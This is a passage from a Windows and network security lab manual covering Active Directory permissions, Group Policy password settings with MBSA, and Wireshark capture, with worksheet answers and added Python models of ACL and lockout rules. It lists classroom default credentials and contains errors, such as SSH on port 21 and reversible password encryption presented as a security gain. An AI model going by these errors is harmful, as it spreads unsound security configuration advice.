e. Use Notepad to create a new text file, lab2file.txt, in C:\ERPdocuments\HRfiles.
f. Attempt to create a new text file, lab2file.txt, in C:\ERPdocuments\SFfiles (this should be denied).
13. Log in as Manager01 and verify that you can read and write files in C:\ERPdocuments\HRfiles and C:\ERPdocuments\MGRfiles, but not in C:\ERPdocuments\SFfiles.
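The permission design that step 11 asks for, and the results that steps 12 and 13 should produce, can be worked out before touching the server. The following is an added example, not part of the lab manual: a small Python model of how Windows evaluates an NTFS discretionary ACL, loaded with the lab's four users and three groups. The folder ACLs in it are a proposed design, not something the lab specifies; it assumes that inheritance from C:\ERPdocuments is removed on the three sub-folders, that Domain Admins keeps Full Control everywhere, that Authenticated Users may only read the top-level folder, and it models rights as a three-bit subset of the real NTFS access mask.

```python
# Added example (not from the Jones & Bartlett lab manual): a model of Windows
# DACL evaluation used to design the step 11 permissions and predict steps 12-13.
# Assumptions: inheritance removed on the sub-folders, Domain Admins has Full
# Control, Authenticated Users can read C:\ERPdocuments, rights are a 3-bit subset
# of the real NTFS access mask.
from dataclasses import dataclass
from typing import Dict, List, Set

READ = 0x1
WRITE = 0x2
FULL = READ | WRITE | 0x4       # 0x4 stands in for the delete / change-permissions bits

ERPDOCS = r"C:\ERPdocuments"
SFFILES = r"C:\ERPdocuments\SFfiles"
HRFILES = r"C:\ERPdocuments\HRfiles"
MGRFILES = r"C:\ERPdocuments\MGRfiles"

# Group memberships exactly as created in step 9; "administrator" is the lab's
# domain administrator account (assumed to be in Domain Admins).
GROUPS: Dict[str, Set[str]] = {
    "SFuser01": {"ShopFloor"},
    "SFmanager": {"ShopFloor", "Manager"},
    "HRuser01": {"HumanResources"},
    "Manager01": {"HumanResources", "Manager"},
    "administrator": {"Domain Admins"},
}


@dataclass(frozen=True)
class Ace:
    trustee: str          # user or group the entry applies to
    mask: int             # rights granted (or denied)
    allow: bool = True    # False models an explicit Deny entry


# Proposed design for step 11: every entry names a group, so access follows the
# role a user holds, and a user in two groups (Manager01, SFmanager) picks up
# both folders without any per-user entry.
ACLS: Dict[str, List[Ace]] = {
    ERPDOCS: [Ace("Domain Admins", FULL), Ace("Authenticated Users", READ)],
    SFFILES: [Ace("Domain Admins", FULL), Ace("ShopFloor", READ | WRITE)],
    HRFILES: [Ace("Domain Admins", FULL), Ace("HumanResources", READ | WRITE)],
    MGRFILES: [Ace("Domain Admins", FULL), Ace("Manager", READ | WRITE)],
}


def token_sids(user: str) -> Set[str]:
    """Identities in the user's access token: the user itself, its groups, and
    the well-known Authenticated Users group every logged-on domain user carries."""
    return {user, "Authenticated Users"} | GROUPS.get(user, set())


def access_check(user: str, path: str, desired: int,
                 acls: Dict[str, List[Ace]] = ACLS) -> bool:
    """Windows-style DACL evaluation. Entries are walked in order; an explicit
    Deny that covers any still-needed right fails the check immediately, Allow
    entries accumulate, and the check succeeds once nothing is left to grant.
    A folder with no matching entry therefore grants nothing (no Deny needed)."""
    sids = token_sids(user)
    remaining = desired
    for ace in acls.get(path, []):
        if ace.trustee not in sids:
            continue
        if not ace.allow:
            if ace.mask & remaining:
                return False
        else:
            remaining &= ~ace.mask
        if remaining == 0:
            return True
    return remaining == 0


def can_create_file(user: str, folder: str) -> bool:
    """Steps 12 and 13 create a text file with Notepad, which needs Read and Write on the folder."""
    return access_check(user, folder, READ | WRITE)


def verification_matrix() -> Dict[str, Dict[str, bool]]:
    """Predicted outcome of steps 12 and 13 for every lab user and sub-folder."""
    return {user: {folder.rsplit("\\", 1)[1]: can_create_file(user, folder)
                   for folder in (SFFILES, HRFILES, MGRFILES)}
            for user in ("SFuser01", "HRuser01", "Manager01", "SFmanager")}


if __name__ == "__main__":
    for user, row in verification_matrix().items():
        print(f"{user:<10}", " ".join(f"{k}={'RW' if v else '--'}" for k, v in row.items()))
```

Running it prints the expected step 12/13 results (SFuser01 gets SFfiles only, HRuser01 gets HRfiles only, Manager01 gets HRfiles and MGRfiles, SFmanager gets SFfiles and MGRfiles). Two points worth taking to the real server: Manager01 never needs a Deny entry on SFfiles, because a folder whose ACL simply does not mention any of the user's groups grants nothing; and when a Deny entry is present, Windows honours it ahead of any Allow, even an Allow granted directly to the user, which is why explicit Deny entries should be used sparingly and documented.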
Deliverables
Upon completion of Lab #3: Enable Windows Active Directory and User Access Controls, students are required to provide the following deliverables:
1. Lab #3 text file outlining the Active Directory tree created
2. Lab #3 Lab Assessment Questions & Answers

Evaluation Criteria and Rubrics
The following are the evaluation criteria and rubrics for Lab #3 that the students must perform:
1. Was the student able to design a Windows Active Directory and user access control framework? [20%]
2. Was the student able to create a new Windows Active Directory domain controller definition? [20%]
3. Was the student able to evaluate existing user and group permission rights in Active Directory user accounts and their workstations? [20%]
4. Was the student able to create new Windows Active Directory users and groups with custom permission rights for user accounts and folders? [20%]
5. Was the student able to create and verify access control lists to protect objects and folders from unauthorized access? [20%]

Lab #3 Assessment Worksheet
Enable Windows Active Directory and User Access Controls

Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
LAB Due Date: _______________________________________________________________________

Overview
This lab provides students with the hands-on skills needed to create a new Active Directory domain in Windows Server 2003 and demonstrates how to configure centralized authentication and policy definition for access controls. The Active Directory Users and Computers snap-in will be used to create users and groups and to configure role-based access permissions and controls on objects and folders in a Windows Server 2003 Active Directory system.

Lab Assessment Questions & Answers
1. What are the three fundamental elements of an effective access control solution for information systems?
Identification, authentication and authorization.
2. What two access controls can be set up for Windows Server 2003 folders and authentication?
New Technology File System (NTFS) folder permissions (together with share permissions when the folder is shared on the network) control what each user or group may do with the files, and authentication controls delivered through Group Policy Objects (GPOs), such as password and account lockout policies, control who can log on to reach the sensitive data.
3. If you can browse a file on a Windows network share but are not able to copy it or modify it, what type of access controls and permissions are probably configured? What type of access control would best describe this access control situation?
Read-only access rights (NTFS or share permissions that grant Read but not Write or Modify). This is an example of Discretionary Access Control (DAC): the permissions are set at the discretion of the data owner or administrator, unlike Mandatory Access Control, where access is decided by system-enforced security labels.
4. What is the mechanism on a Windows Server where you can administer granular policies and permissions on a Windows network using role-based access?
Active Directory with Group Policy: GPOs linked to sites, domains and organizational units, with permissions assigned to security groups that represent roles.
5. What is two-factor authentication and why is it an effective access control technique?
Instead of relying on a single factor (something you know, such as a username and password), the user must also present a second, independent factor: something you have, such as a one-time code from a hardware token or a smart card, or something you are, such as a fingerprint or other biometric. Both factors must be presented before access and privileges are granted, so a stolen or guessed password alone is not enough to get into the environment or InfoSec system.
6. Relate how Windows Server 2008 R2 Active Directory and the configuration of access controls achieve C-I-A for departmental LANs, departmental folders, and data.
Windows Server 2008 R2 AD helps organizations implement security policies for access control to LAN servers, departmental applications and data based on user accounts, group membership and permission rights. Creating user login IDs and passwords with frequent password changes helps achieve confidentiality and integrity of data by keeping unauthorized users out. Defining departmental groups and folders delineates and implements user access and permission rights to the data files contained within them, which also supports confidentiality and integrity. Finally, defining specific read/write permissions for specific data files lets intra-departmental folders and data files maintain confidentiality and integrity by limiting access to only those individuals within the department who need it.
7. Is it a good practice to include the account or user name in the password? Why or why not?
No. Including the account name in the password makes it easier for an attacker to guess or crack the password and gain unauthorized access, because the account name is usually already known to the attacker. The Windows password complexity requirement rejects such passwords for the same reason. Best practice for password definitions: never embed your account name or user name within the password itself.
8. Can a user who is defined in Active Directory access a shared drive if that user is not part of the domain?
Yes, but the system administrator must first identify and grant the user's access rights and permission rights on the shared drive, folders, and data files before access is possible.
9. Does Windows Server 2003 require a user's login/password credentials prior to accessing shared drives?
Yes. Regardless of the user, Windows Server 2003 requires login/password credentials (an authenticated session) before granting that user access to shared drives.
10. When granting access to LAN systems for GUESTS (i.e., auditors, consultants, third-party individuals, etc.), what security controls do you recommend be implemented in order to maximize C-I-A of production systems and data?
Require GUEST users to review and sign the organization's Acceptable Use Policy (AUP). If GUEST users will be accessing confidential data of the organization, have them review and sign a confidentiality agreement prior to granting access to the information. Create a separate GUEST domain (or a dedicated organizational unit and security group) whose shared drives, folders, and data files are accessible only by the defined GUEST user names; this acts as a buffer zone for moving, copying, and sharing documents between the organization and the GUEST users. Provide read/write privileges and permission rights to authorized GUEST user names only for the shared GUEST drives, folders, and data files. Prevent GUEST users from seeing other shared drives, folders, and data files, and set the GUEST accounts to expire at the end of the engagement. This prevents unauthorized access and potential C-I-A breaches to systems, applications, and data.
Laboratory #4
Lab #4: Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA)

Learning Objectives and Outcomes
Upon the completion of this lab, the students will be able to conduct the following tasks:
Define Active Directory Group Policy Objects (GPOs) in Windows Server 2003
Deploy GPOs to domain workstations within Windows Server 2003
Configure login credentials and specify password requirements and parameters for domain workstations within Windows Server 2003
Use Microsoft Baseline Security Analyzer (MBSA) to establish a security baseline for a Windows Server 2003 server and a Windows XP Professional workstation
Enable automatic and online security updating and patching from Microsoft's web servers via the Internet for Windows Server 2003 and Windows XP Professional

Required Setup and Tools
This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following are required for this hands-on lab:
A) A classroom workstation (with at least 2 GB RAM) capable of supporting an insertable hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the layer 2 switch for all VM workstations.
B) An instructor workstation (with at least 2 GB RAM) that shall act as the instructor's demo LAB workstation. The instructor will display the workstation on the LCD projector to demo the loading and configuring of the Windows Server 2003 VM GPOs and MBSA.
C) Student lab workstations will use a local copy of the ITT Mock IT Infrastructure VM server farm contained on their removable hard drive to run their Student VM and WindowsTarget01 VM server.

The following summarizes the setup, configuration, and equipment needed to perform Lab #4:
1. A Virtualized Server Farm with the following components:
a. Microsoft DHCP server for allocating student IP host addresses
b. A Student and/or Instructor VM workstation
2. TargetWindows01 VM as needed for this lab:
a. Windows Server 2003 target with MBSA 2.1.1 installed
b. Administrator account access on the Windows Server 2003 target VM server
c. Administrator account access on the Student VM workstation
Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
o Computer Name: Windows02
o Three Users Available: administrator, instructor or student (case sensitive)
o Password: ISS316Security
o IP Address: DHCP
o Domain Login: NO
3. The standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab:
a. VMware Player 3.x
b. Microsoft Office 2007 or higher for the Lab Assessment Questions & Answers

Recommended Procedures
Instructor Demo Lab #4:
The instructor will demonstrate the use of Group Policy Objects in Windows Server 2003 to create a password policy definition and link it to the domain created in the previous lab. In addition, the instructor will demonstrate running the Microsoft Baseline Security Analyzer (MBSA) and discuss the results of the MBSA scan with the students.
MBSA is a security assessment tool from Microsoft that helps track missing security updates and less-secure security settings on the Microsoft Windows platforms.

Hands-on Lab #4 Instructor Steps:
The instructor will perform the following demonstration:
1. Connect the instructor removable hard drive to your workstation.
2. Boot up the Instructor VM and the Microsoft DHCP VM server to allocate an IP host address.
3. Open a command prompt (cmd.exe), type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1.
4. Log in to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch.
NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can power on WindowsDHCP01 and TargetWindows01 together to maximize performance, or you can load the WindowsDHCP01 VM server on a separate workstation connected to the classroom layer 2 switch. This will allow you to load the Instructor VM workstation and the TargetWindows01 VM server on the same physical workstation.
5. Log in to the Instructor VM and the TargetWindows01 VM server.
6. Launch the Group Policy Management Console on Windows01: Start -> Administrative Tools -> Group Policy Management. (The Forest -> Domains tree used in the next steps belongs to this console, not to Active Directory Users and Computers; on Windows Server 2003 the console is a separate download from Microsoft.)
7. In the tree view, expand Forest -> Domains -> domainname.
8. Right-click Group Policy Objects to open its context menu and select New.
9. Enter PasswordGPO for the name and select OK.
10. Open the context menu of the newly created GPO and select Edit.
11. In the Group Policy Management Editor tree view, expand Computer Configuration -> Windows Settings -> Security Settings -> Account Policies and select Password Policy. (On Windows Server 2008 and later editors there is an additional Policies node between Computer Configuration and Windows Settings.)
12. Double-click Password must meet complexity requirements and choose Enabled. Choose OK.
13. Double-click Minimum password length and enter 8. Choose OK.
Figure 12 Microsoft Windows Group Policy Management Editor
14. Close the Group Policy Management Editor.
15. Open the context menu for the domain and select Link an Existing GPO.
16. Select PasswordGPO and choose OK.
17. Open the context menu for PasswordGPO and choose Save Report. Enter the desired filename and folder to save the PasswordGPO report.
18. Launch MBSA from the Windows Server 2003 desktop.
19. Select Scan a computer.
20. Remove the check mark from Check for security updates if the system does not have Internet access (that check needs the current update catalog from Microsoft Update or a WSUS server; the administrative-vulnerability checks run offline).
21. Choose Start Scan.
Figure 13 Microsoft Baseline Security Analyzer
22. When the scan is complete, select Copy to clipboard to save the output to the clipboard.
23. Open Notepad, paste the clipboard contents, and save the MBSA scan results.

Hands-on Lab #4 Student Steps:
To perform this hands-on lab, students are required to perform the following steps:
1. Connect the student removable hard drive to your workstation.
2. Boot up the Student VM and the Microsoft DHCP VM server to allocate an IP host address.
3. Open a command prompt (cmd.exe), type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1.
4. Log in to your Student VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch.
NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can power on WindowsDHCP01 and TargetWindows01 together to maximize performance, or you can load the WindowsDHCP01 VM server on a separate workstation connected to the classroom layer 2 switch. This will allow you to load the Student VM workstation and the TargetWindows01 VM server on the same physical workstation.
5. Log in to the Student VM and the Windows01 target VM.
6. Launch the Group Policy Management Console on Windows01: Start -> Administrative Tools -> Group Policy Management.
7. In the tree view, expand Forest -> Domains -> domainname.
8. Right-click Group Policy Objects to open its context menu and select New.
9. Enter PasswordGPO for the name and select OK.
10. Open the context menu of the newly created GPO and select Edit.
11. In the Group Policy Management Editor tree view, expand Computer Configuration -> Windows Settings -> Security Settings -> Account Policies and select Password Policy.
12. Double-click Password must meet complexity requirements and choose Enabled. Choose OK.
13. Double-click Minimum password length and enter 8. Choose OK.
Figure 12 Microsoft Windows Group Policy Management Editor
14. Close the Group Policy Management Editor.
15. Open the context menu for the domain and select Link an Existing GPO.
16. Select PasswordGPO and choose OK.
17. Open the context menu for PasswordGPO and choose Save Report. Enter the desired filename and folder to save the PasswordGPO report.
18. Launch MBSA from the Windows Server 2003 desktop.
19. Select Scan a computer.
20. Remove the check mark from Check for security updates if the system does not have Internet access.
21. Choose Start Scan.
Figure 13 Microsoft Baseline Security Analyzer
22. When the scan is complete, select Copy to clipboard to save the output to the clipboard.
23. Open Notepad, paste the clipboard contents, save the MBSA scan results, and submit them as part of your Lab #4 deliverables.

Deliverables
Upon completion of the Group Policy Objects and MBSA lab, students are required to provide the following deliverables:
1. Lab #4 soft copy of the GPO report for the GPO created in this lab, in HTML format
2. Lab #4 Word document that contains the results of the MBSA scan
3. Lab #4 Assessment Questions & Answers

Evaluation Criteria and Rubrics
The following are the evaluation criteria and rubrics for Lab #4 that the students must perform:
1. Was the student able to define Active Directory Group Policy Objects (GPOs) in Windows Server 2003? [20%]
2. Was the student able to deploy GPOs to domain workstations within Windows Server 2003? [20%]
3. Was the student able to configure login credentials and specify password requirements and parameters for domain workstations within Windows Server 2003? [20%]
4. Was the student able to use Microsoft Baseline Security Analyzer (MBSA) to establish a security baseline for a Windows Server 2003 server and a Windows XP Professional workstation? [20%]
5. Was the student able to enable automatic and online security updating and patching from Microsoft's web servers via the Internet for Windows Server 2003 and Windows XP Professional? [20%]
Lab #4 Assessment Worksheet
Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA)
Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
LAB Due Date: _______________________________________________________________________

Overview
During this lab the students will use Group Policy Objects to create a Minimum Password Length password policy and link it to the domain created in the previous lab. They will also run the Microsoft Baseline Security Analyzer (MBSA) and discuss the results of the MBSA scan with the class.

Lab Assessment Questions & Answers
1. Define why change control management is relevant to security operations in an organization.
Technology advances, newly discovered vulnerabilities, and updates requiring restarts all affect availability and the maintenance of system integrity.
2. What type of access control system uses security labels?
Mandatory access control
3. Describe two options you would enable in a Windows Domain password policy.
Complexity requirements: require uppercase and lowercase letters, special characters and numbers, or any combination of these. Require 8 or more characters. Enforce password refreshes every 30-45 days. Enforce a history of up to the last x passwords.
4. Where would patch management and software updates fall under in security operations and management?
Change control management
5. Is there a setting in your GPO to specify how many login attempts will lock out an account? Name 2 parameters that you can set to enhance the access control to the system.
Yes. You can set the duration of the lockout period and the maximum number of login attempts before lockout.
6. What are some Password Policy parameter options you can define for GPOs that can enhance the C-I-A for system access?
a. Enforce password history so old passwords cannot be re-enabled
b. Maximum password age: how many days or months is the maximum allowed use of a password
c. Minimum password age: the minimum number of days or months that a password must be used
d. Store password using reversible encryption
7. What sources could you use to perform the MBSA security-state scan?
a. WSUS Server
b. Microsoft Update live site
c. Microsoft Update (offline)
8. What does WSUS stand for, and what does it do?
Windows Server Update Services works like the Windows Update website. It contains updates for Windows and other MS applications, but it is controlled by the administrator of the corporate environment.
9. What is the difference between MBSA and Microsoft Update?
Microsoft Update is a website that can scan a single computer, indicate missing/needed security and non-security updates, and install them as a group automatically and completely transparently to the user. MBSA performs a Windows-centric vulnerability assessment scan and identifies missing/needed security updates and software patches.
10. What are some of the options that you can exercise when using the MBSA tool?
a. Check for Windows administrative vulnerabilities
b. Check for weak passwords
c. Check for IIS administrative vulnerabilities
d. Check for SQL administrative vulnerabilities
e. Check for security updates
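The password-policy and account-lockout parameters the worksheet asks about in questions 3, 5 and 6 can be exercised offline with the following model. This is an added example and not code from the lab manual or from Jones & Bartlett: the PasswordPolicy and Account classes, the threshold values and the account name jsmith are constructed, and the complexity check is modelled on the documented Windows rule (at least three of the four character classes, and no piece of the account name of three or more characters inside the password).

```python
"""Added example, not from the lab manual: a model of the GPO password-policy and
account-lockout settings the Lab #4 worksheet asks about. Threshold values and the
account name are constructed; the complexity rule follows the documented Windows
behaviour (3 of 4 character classes, no 3+-character piece of the account name)."""
import hashlib
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List, Optional


@dataclass
class PasswordPolicy:
    minimum_length: int = 8              # Minimum password length
    complexity_required: bool = True     # Password must meet complexity requirements
    history_size: int = 5                # Enforce password history
    maximum_age_days: int = 45           # Maximum password age
    minimum_age_days: int = 1            # Minimum password age
    lockout_threshold: int = 5           # Account lockout threshold (invalid attempts)
    lockout_duration_minutes: int = 30   # Account lockout duration

@dataclass
class Account:
    username: str
    history: List[str] = field(default_factory=list)   # password hashes, newest last
    last_change: datetime = field(default_factory=datetime.now)
    failed_attempts: int = 0
    locked_until: Optional[datetime] = None

def _fingerprint(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()   # history stores hashes only

def meets_complexity(password: str, username: str) -> bool:
    """Windows-style rule: >= 3 of 4 character classes and no 3+ character
    token of the account name (case-insensitive) inside the password."""
    classes = [any(c.isupper() for c in password), any(c.islower() for c in password),
               any(c.isdigit() for c in password), any(not c.isalnum() for c in password)]
    if sum(classes) < 3:
        return False
    lowered = password.lower()
    return not any(len(t) >= 3 and t in lowered
                   for t in username.lower().replace(".", " ").split())

def validate_change(policy, account, new_password, now) -> List[str]:
    """Every policy violation for a proposed change; an empty list means allowed."""
    problems = []
    if len(new_password) < policy.minimum_length:
        problems.append(f"shorter than {policy.minimum_length} characters")
    if policy.complexity_required and not meets_complexity(new_password, account.username):
        problems.append("does not meet complexity requirements")
    recent = account.history[-policy.history_size:] if policy.history_size else []
    if _fingerprint(new_password) in recent:
        problems.append(f"reuses one of the last {policy.history_size} passwords")
    if now - account.last_change < timedelta(days=policy.minimum_age_days):
        problems.append("minimum password age not reached")
    return problems

def apply_change(policy, account, new_password, now) -> List[str]:
    problems = validate_change(policy, account, new_password, now)
    if not problems:
        kept = account.history + [_fingerprint(new_password)]
        account.history = kept[-policy.history_size:] if policy.history_size else []
        account.last_change = now
    return problems

def password_expired(policy, account, now) -> bool:
    return now - account.last_change > timedelta(days=policy.maximum_age_days)

def record_logon_attempt(policy, account, success, now) -> str:
    """Lockout counter (worksheet Q5): returns 'ok', 'failed' or 'locked'. A correct
    password presented during the lockout window is still refused."""
    if account.locked_until is not None and now < account.locked_until:
        return "locked"
    if success:
        account.failed_attempts, account.locked_until = 0, None
        return "ok"
    account.failed_attempts += 1
    if account.failed_attempts >= policy.lockout_threshold:
        account.locked_until = now + timedelta(minutes=policy.lockout_duration_minutes)
        account.failed_attempts = 0
        return "locked"
    return "failed"

def demo() -> List[str]:
    """Walk one constructed account through the policy; returns what was observed."""
    policy, acct = PasswordPolicy(), Account("jsmith", last_change=datetime(2010, 1, 1))
    now = datetime(2010, 2, 1)
    out = [str(apply_change(policy, acct, "Tr0ub4dor&3", now))]
    out.append(str(validate_change(policy, acct, "Tr0ub4dor&3", now + timedelta(days=2))))
    out.append(str(validate_change(policy, acct, "Short1!", now + timedelta(hours=1))))
    out.append(str(password_expired(policy, acct, now + timedelta(days=46))))
    out += [record_logon_attempt(policy, acct, False, now) for _ in range(5)]
    out.append(record_logon_attempt(policy, acct, True, now + timedelta(minutes=10)))
    out.append(record_logon_attempt(policy, acct, True, now + timedelta(minutes=31)))
    return out
```

Running demo() shows the interplay the worksheet describes: the first strong password is accepted, reusing it two days later is refused by the history setting, a short password changed an hour later trips both minimum length and minimum age, the password is expired once the maximum age passes, and the fifth bad logon locks the account for the configured duration, during which even the correct password is refused.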
Laboratory #5
Lab #5: Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator

Learning Objectives and Outcomes
Upon completing this lab, students will be able to:
Use Wireshark & Netwitness Investigator as packet capture and protocol analysis tools
Capture live IP, ICMP, TCP and UDP traffic using TELNET, FTP, TFTP, and SSH sessions
Examine captured packet traces to view clear-text and cipher-text
Analyze the packet capture data in Netwitness Investigator and identify the difference between UDP and TCP sessions
Identify common network-related protocols used for client-server communications, network management and network security

Required Setup and Tools
This lab requires the use of the ISS Mock IT Infrastructure and Virtualized Server Farm, shown below:
Figure 1: ISS Onsite Mock IT Infrastructure & Virtualized Server Farm

The Mock IT Infrastructure and Virtualized Server Farm is a preconfigured IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP addressing schema, VLAN configurations, and layer 3 switching are preconfigured. The IP networking infrastructure remains static and only needs the following removable parts:
A) A classroom workstation (with at least 4 GB RAM) capable of supporting an insertable hard drive or USB hard drive with a preconfigured, virtualized server farm. This classroom workstation supports the virtualized VM server farm connected to the classroom layer 2 switch and the connection to ASA_Instructor.
B) An instructor VM workstation (with at least 2 GB RAM) that acts as the demonstration traffic generator for the protocol capture hands-on labs.
The Instructor will engage ARP, DHCP, ICMP, the TCP 3-way handshake, FTP, HTTP, TELNET, and SSH to demonstrate protocol interaction from a preconfigured Instructor Virtual Machine (VM). The Instructor workstation connects to the same layer 2 switch and then to ASA_Instructor.
C) Student VM workstations (with at least 2 GB RAM) use a preconfigured Student VM to act as an Attacker VM as well as a traffic monitoring and protocol capture device. Since all the Student VM workstations are connected to the same layer 2 switch, students can perform the protocol interaction lab (i.e., arp, dhcp, ping, telnet, ssh, tftp, ftp, etc.) while they capture their own packets using Wireshark as a protocol capture tool.

The following summarizes the setup, configuration, and equipment needed to perform Lab #5:
1. Standard ITT Mock IT Infrastructure and Virtualized Server Farm configuration and setup
a. Cisco 2801 routers, 2960 Catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs
2. A Virtualized Server Farm with:
a. Microsoft DHCP server for allocating student IP host addresses
b. A Student and/or Instructor VM workstation
3. Target VMs as described by the Lab:
a. Instructor and Student VM workstations with desktop applications and tools:
o Wireshark 1.2.9 for packet capturing and protocol analysis
o NetWitness Investigator v9.0 for packet capturing and protocol analysis
o TELNET and SSH open source client software: PuTTY
o FTP and TFTP open source client software: FileZilla and TFTPd32
o Adobe Reader for PDF documentation
4. Standard ISS onsite student workstation must have the following software applications loaded to perform this lab:
a. VMware Player 3.x
b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Recommended Procedures
Instructor Demo Lab #5:
The Instructor will perform a live demonstration showing the loading and enabling of a packet capture session using Wireshark. The Instructor will initiate IP traffic by pinging from the DOS command prompt and by Telnet-ing, SSH-ing, TFTP-ing, and FTP-ing sample files from the Instructor VM workstation, acting as client, to the TargetWindows01 VM server, acting as server. The Instructor will also Telnet and SSH to various Cisco devices in the ISS Mock IT Infrastructure. The students can ask questions as they become familiar with the functions of the protocol analyzer and examine packet decodes from the Data Link layer (Ethernet), to the Network layer (IP), and up to the Transport layer (TCP/UDP).

Hands-on Lab #5 Instructor Steps:
Steps to be performed by the instructor before and during the lab demonstration:
1. Connect the instructor removable hard drive to your workstation
2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address
3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display
4. Open your DOS command prompt, type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch:
Login ID: instructor or student (case sensitive)
Password: ISS316Security (case sensitive)
NOTE: If the workstations in your physical classroom have only 2 GB of RAM then only two VMs can be powered on at once. You have to split the VM server farm across 2 physical workstations, loading 2 VM servers on each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance.
6. Power up, in VMware Player, the TargetWindows01 VM server and log on using the provided credentials:
Windows 2003 Server Standard Edition
Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
o Computer Name: Windows02
o Three Users Available: administrator, instructor or student (case sensitive)
o Password: ISS316Security
o IP Address: DHCP
o Domain Login: NO
FTP (Filezilla FTP Server)
o Port: 21
o Username: instructor or student
o Password:
TFTP (Tftpd32 TFTP Server)
o Port: 69
o Username:
o Password:
7. Power up, in VMware Player, the TargetUbuntu01 VM server and SSH logon using the provided credentials:
Ubuntu Server Target VM - TargetUbuntu01
Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01)
o Computer Name: Ubuntu01
o ONE User available ONLY in v1: administrator
o Three Users available in v2: administrator, student or instructor
o Password: ISS316Security (case sensitive)
o IP Address: eth0 set to DHCP, eth1 and eth2 not set.
SSH
o Port: 21
o Username: administrator
o Password: ISS316Security (case sensitive)
Apache running Damn Vulnerable Web App (DVWA)
o URL: http:///dvwa
o Password: password
o Username: admin
8. Identify the target network device IP addresses from the following chart:
9. Load Wireshark, and start a packet capture in promiscuous mode while you perform the various traffic generating tasks
10. From your DOS command prompt, make sure you can ping the destination IP address before you attempt to TELNET, SSH, TFTP, or FTP to the destination host, as follows:
Ping 172.30.0.___ (your IP host address allocated by the DHCP server)
Ping 172.30.0.10 (the DHCP server)
Ping 172.30.0.1 (the IP default gateway router)
Ping 172.X.X.X (where 172.X.X.X = IP destination address)
11. Run the PuTTY application from the Instructor VM workstation and enter the targeted IP addresses for your TELNET and SSH exercise:
a. TELNET to LAN Switch 1 and enter the userid and password of cisco / cisco
b. TELNET to Indy and enter the userid and password of cisco / cisco
c. TELNET to Tampa and enter the userid and password of cisco / cisco
d. SSH to LAN Switch 2 (only for 2960s that support SSH) and enter the userid and password of cisco / cisco
e. SSH to the TargetUbuntu01 VM server (172.30.0.X: check the DHCP server for the IP host address or ask the Instructor what the IP host address is) and enter the SSH (port 21) login credentials:
o Port: 21
o Username: administrator
o Password: ISS316Security (case sensitive)
f. SSH to WestCovina (if SSH is enabled) and enter the userid and password of cisco / cisco
g. Click on TFTPd32 on your desktop, and load the client on your student VM workstation. TFTP a small file from your Student VM workstation to the TFTPd32 Server on the TargetWindows01 VM server (172.30.0.X: ask your instructor for the allocated IP host address of the TargetWindows01 VM server)
h. Click on Filezilla FTP on your desktop and load the client FTP application on your student VM workstation. FTP a small file from your Student VM workstation to the FileZilla FTP server on the TargetWindows01 VM server (172.30.0.X: ask your instructor for the allocated IP host address of the TargetWindows01 VM server)
12. Stop Capture in Wireshark, save the file as IT255 Lab #5.pcap, and submit it as part of your lab deliverables; review the protocol decode and answer the Lab #5 assessment questions
13. Import the IT255 Lab #5.pcap file into Netwitness Investigator by first creating a new local connection called IT255 Lab #5.pcap and then importing the *.pcap file into Netwitness Investigator for detailed protocol analysis; show the students how Netwitness performs protocol analysis

Hands-on Lab #5 Student Steps:
To perform this hands-on lab, students are required to perform the following steps:
1. Connect the instructor removable hard drive to your workstation
2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address
3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display
4. Open your DOS command prompt, type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch:
Login ID: instructor or student (case sensitive)
Password: ISS316Security (case sensitive)
NOTE: If the workstations in your physical classroom have only 2 GB of RAM then only two VMs can be powered on at once. You have to split the VM server farm across 2 physical workstations, loading 2 VM servers on each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance.
6.
Power up, in VMware Player, the TargetWindows01 VM server and log on using the provided credentials:
Windows 2003 Server Standard Edition
Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
o Computer Name: Windows02
o Three Users Available: administrator, instructor or student (case sensitive)
o Password: ISS316Security
o IP Address: DHCP
o Domain Login: NO
FTP (Filezilla FTP Server)
o Port: 21
o Username: instructor or student
o Password:
